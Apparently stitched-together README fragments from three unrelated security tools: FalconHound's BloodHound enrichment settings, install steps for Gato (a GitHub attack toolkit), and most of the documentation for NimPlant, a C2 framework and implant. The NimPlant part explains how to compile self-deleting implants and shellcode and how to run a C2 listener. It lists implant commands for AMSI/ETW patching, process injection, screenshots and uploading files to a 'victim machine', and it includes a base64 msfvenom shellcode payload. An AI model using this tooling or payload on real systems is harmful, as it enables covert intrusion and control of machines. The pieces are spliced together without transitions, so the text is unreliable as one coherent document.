Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
Enabled: true
Table: "name"
Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession
. The relationship will have the following properties:
{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
FalconHound will add the following properties to nodes in the graph:
Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids
The currently supported ways of providing FalconHound with credentials are:
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.
The required permissions for your AppID/AppSecret are listed here.
A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User
role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository
Once configured you can add the -keyvault
parameter while starting FalconHound.
When the -keyvault
parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml
. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both blue teamers and offensive security practitioners to evaluate the blast radius of a compromised personal access token within a GitHub organization.
The tool also allows searching for and thoroughly enumerating public repositories that utilize self-hosted runners. GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners.
Gato supports OS X and Linux with at least Python 3.7.
In order to install the tool, simply clone the repository and use pip install
. We recommend performing this within a virtual environment.
git clone https://github.com/praetorian-inc/gato
cd gato
python3 -m venv venv
source venv/bin/activate
pip install .
Gato also requires that git
version 2.27
or above is installed and on the system's PATH. In order to run the fork PR attack module, sed
must also be installed and present on the system's path.
After installing the tool, it can be launched by running gato
or praetorian-gato
.
We recommend viewing the parameters for the base tool using gato -h
, and the parameters for each of the tool's modules by running the following:
gato search -h
gato enum -h
gato attack -h
The tool requires a GitHub classic PAT in order to function. To create one, log in to GitHub and go to GitHub Developer Settings and select Generate New Token
and then Generate new token (classic)
.
After creating this token set the GH_TOKEN
environment variable within your shell by running export GH_TOKEN=<YOUR_CREATED_TOKEN>
. Alternatively, store the token within a secure password manager and enter it when the application prompts you.
For troubleshooting and additional details, such as installing in developer mode or running unit tests, please see the wiki.
Please see the wiki. for detailed documentation, as well as OpSec considerations for the tool's various modules!
If you believe you have identified a bug within the software, please open an issue containing the tool's output, along with the actions you were trying to conduct.
If you are unsure if the behavior is a bug, use the discussions section instead!
Contributions are welcome! Please review our design methodology and coding standards before working on a new feature!
Additionally, if you are proposing significant changes to the tool, please open an issue open an issue to start a conversation about the motivation for the changes.
By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:
execute-assembly
& self-deleting implant optioninline-execute
inline-execute
, shinject
(using dynamic invocation), or in-thread execute-assembly
choosenim
is recommended, as apt
doesn't always have the latest version).cd client; nimble install -d
).requirements.txt
from the server folder (pip3 install -r server/requirements.txt
).mingw
toolchain for your platform (brew install mingw-w64
or apt install mingw-w64
).Before using NimPlant, create the configuration file config.toml
. It is recommended to copy config.toml.example
and work from there.
An overview of settings is provided below.
Category | Setting | Description |
---|---|---|
server | ip | The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1, only use 0.0.0.0 when you have setup proper firewall or routing rules to protect the C2. |
server | port | The port that the C2 web server (including API) will listen on. |
listener | type | The listener type, either HTTP or HTTPS. HTTPS options configured below. |
listener | sslCertPath | The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is 'HTTP'. |
listener | sslKeyPath | The local path to the corresponding HTTPS certificate private key file. Password will be prompted when running the NimPlant server if set. Ignored when listener type is 'HTTP'. |
listener | hostname | The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port. |
listener | ip | The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP. |
listener | port | The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port. |
listener | registerPath | The URI path that new NimPlants will register with. |
listener | taskPath | The URI path that NimPlants will get tasks from. |
listener | resultPath | The URI path that NimPlants will submit results to. |
nimplant | riskyMode | Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly , powershell , shell and shinject . |
nimplant | sleepMask | Whether or not to use Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now! |
nimplant | sleepTime | The default sleep time in seconds for new NimPlants. |
nimplant | sleepJitter | The default jitter in percent for new NimPlants. |
nimplant | killDate | The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed. |
nimplant | userAgent | The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent. |
Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe
, .dll
, and .bin
binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile
followed by your preferred binaries (exe
, exe-selfdelete
, dll
, raw
, or all
) and, optionally, the implant type (nim
, or nim-debug
). Files will be written to client/bin/
.
You may pass the rotatekey
argument to generate and use a new XOR key during compilation.
Notes:
Update
, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update
to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim
)PS C:\NimPlant> python .\NimPlant.py compile all
* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|
A light-weight stage 1 implant and C2 based on Nim and Python
By Cas van Cooten (@chvancooten)
Compiling .exe for NimPlant
Compiling self-deleting .exe for NimPlant
Compiling .dll for NimPlant
Compiling .bin for NimPlant
Done compiling! You can find compiled binaries in 'client/bin/'.
The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.
To use it, install Docker for your OS and start the compilation in a container as follows.
docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all
Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml
file. To launch a server, simply run python NimPlant.py server
(with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337
(by default).
Notes:
config.toml
and .xorkey
match. If not, NimPlant will not be able to connect.client/NimPlant.nim
).server/logs
directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads
and server/downloads
directories respectively.server/nimplant.db
. This data is also used to recover Nimplants after a server restart.NimPlant.py
with the cleanup
flag. Caution: This will purge everything, so make sure to back up what you need first!PS C:\NimPlant> python .\NimPlant.py server
* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|
A light-weight stage 1 implant and C2 written in Nim and Python
By Cas van Cooten (@chvancooten)
[06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
[06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.
This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337
) and the NimPlant listener (in the example above at https://0.0.0.0:443
). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.
Available commands are as follows. You can get detailed help for any command by typing help [command]
. Certain commands denoted with (GUI) can be configured graphically when using the web interface, this can be done by calling the command without any arguments.
Command arguments shown as [required] <optional>.
Commands with (GUI) can be run without parameters via the web UI.
cancel Cancel all pending tasks.
cat [filename] Print a file's contents to the screen.
cd [directory] Change the working directory.
clear Clear the screen.
cp [source] [destination] Copy a file or directory.
curl [url] Get a webpage remotely and return the results.
download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
env Get environment variables.
execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
exit Exit the server, killing all NimPlants.
getAv List Antivirus / EDR products on target using WMI.
getDom Get the domain the target is joined to.
getLocalAdm List local administrators on the target using WMI.
getpid Show process ID of the currently selected NimPlant.
getprocname Show process name of the currently selected NimPlant.
help <command> Show this help menu or command-specific help.
hostname Show hostname of the currently selected NimPlant.
inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
ipconfig List IP address information of the currently selected NimPlant.
kill Kill the currently selected NimPlant.
list Show list of active NimPlants.
listall Show list of all NimPlants.
ls <path> List files and folders i n a certain directory. Lists current directory by default.
mkdir [directory] Create a directory (and its parent directories if required).
mv [source] [destination] Move a file or directory.
nimplant Show info about the currently selected NimPlant.
osbuild Show operating system build information for the currently selected NimPlant.
powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
ps List running processes on the target. Indicates current process.
pwd Get the current working directory.
reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
rm [file] Remove a file or directory.
run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
screenshot Take a screenshot of the user's screen.
select [id] Select another NimPlant.
shell [command] Execute a shell command.
shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
wget [url] <remotefilepath> Download a file to disk remotely.
whoami Get the user ID that NimPlant is running as.
NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!
NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a bof requires a local compiled BOF object file (usually called something like bofname.x64.o
), an entrypoint (commonly go
), and a list of arguments with their respective argument types. Arguments are passed as a space-seperated arg argtype
pair.
Argument are given in accordance with the "Zzsib" format, so can be either string
(alias: z
), wstring
(or Z
), integer
(aliases: int
or i
), short
(s
), or binary
(bin
or b
). Binary arguments can be a raw binary string or base64-encoded, the latter is recommended to avoid bad characters.
Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute
(without arguments) can be used to configure the command graphically in the GUI.
# Run a bof without arguments
inline-execute ipconfig.x64.o go
# Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z
# Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
# Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7 RxNyb2oAWUGJ2v/VY2FsYy5leGUA b
# Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
# Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
# An example:
inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected
By default, NimPlant support push notifications via the notify_user()
hook defined in server/util/notify.py
. By default, it implements a simple Telegram notification which requires the TELEGRAM_CHAT_ID
and TELEGRAM_BOT_TOKEN
environment variables to be set before it will fire. Of course, the code can be easily extended with one's own push notification functionality. The notify_user()
hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.
As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install
while in the ui
directory. Then run ui/build-ui.py
. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.
NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode
to false
in config.toml
.
There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):
chvancooten/nimbuild
docker container to rule out any dependency issuesserver/logs
directory for any errorsnim-debug
compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned